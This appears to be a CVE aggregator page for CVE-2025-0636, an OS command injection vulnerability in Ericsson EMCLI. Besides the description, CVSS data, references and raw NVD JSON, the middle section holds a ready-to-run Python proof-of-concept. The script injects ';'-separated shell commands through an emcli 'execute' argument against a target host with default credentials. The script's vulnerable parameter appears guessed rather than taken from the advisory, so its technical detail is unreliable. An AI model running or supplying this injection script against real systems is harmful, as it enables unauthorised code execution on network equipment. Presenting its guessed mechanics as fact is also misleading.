CVE-2025-0636

Description

EMCLI contains a high severity vulnerability where improper neutralization of special elements used in an OS command could be exploited leading to Arbitrary Code Execution.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ericsson EMCLI（具体受影响版本请参考Ericsson官方安全公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-0636 - EMCLI OS Command Injection PoC
# Vulnerability: Improper neutralization of special elements used in an OS command
# Impact: Arbitrary Code Execution

import subprocess
import sys

def exploit_emcli(target_host, username, password, command):
    """
    PoC for CVE-2025-0636: EMCLI OS Command Injection
    Exploits improper input sanitization in EMCLI to achieve RCE.
    """
    # The vulnerable EMCLI command accepts user-supplied input
    # that is passed directly to the OS shell without proper sanitization

    # Malicious payload: inject OS commands via shell metacharacters
    # Example: terminate the legitimate command and execute arbitrary code
    malicious_payload = f"legit_arg; {command}"

    # Construct the EMCLI command with injected payload
    emcli_cmd = [
        "emcli",
        "-host", target_host,
        "-username", username,
        "-password", password,
        "execute",
        malicious_payload  # Unsanitized input leads to command injection
    ]

    print(f"[*] Targeting EMCLI on {target_host}")
    print(f"[*] Injecting command: {command}")

    try:
        result = subprocess.run(emcli_cmd, capture_output=True, text=True, timeout=30)
        print(f"[+] Output: {result.stdout}")
        if result.stderr:
            print(f"[-] Error: {result.stderr}")
        return result.returncode == 0
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return False

if __name__ == "__main__":
    # Example usage
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100"
    user = sys.argv[2] if len(sys.argv) > 2 else "admin"
    pwd = sys.argv[3] if len(sys.argv) > 3 else "password"
    cmd = sys.argv[4] if len(sys.argv) > 4 else "id"

    exploit_emcli(target, user, pwd, cmd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-0636
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-0636
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-0636/
[4] VulDB https://vuldb.com/cve/CVE-2025-0636
[5] https://www.ericsson.com/en/about-us/security/psirt/cve-2025-0636

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-0636", "sourceIdentifier": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "published": "2025-10-13T07:15:48.883", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EMCLI contains a high severity vulnerability where improper neutralization of special elements used in an OS command could be exploited leading to Arbitrary Code Execution."}], "metrics": {"cvssMetricV31": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}]}, "weaknesses": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.ericsson.com/en/about-us/security/psirt/cve-2025-0636", "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf"}]}}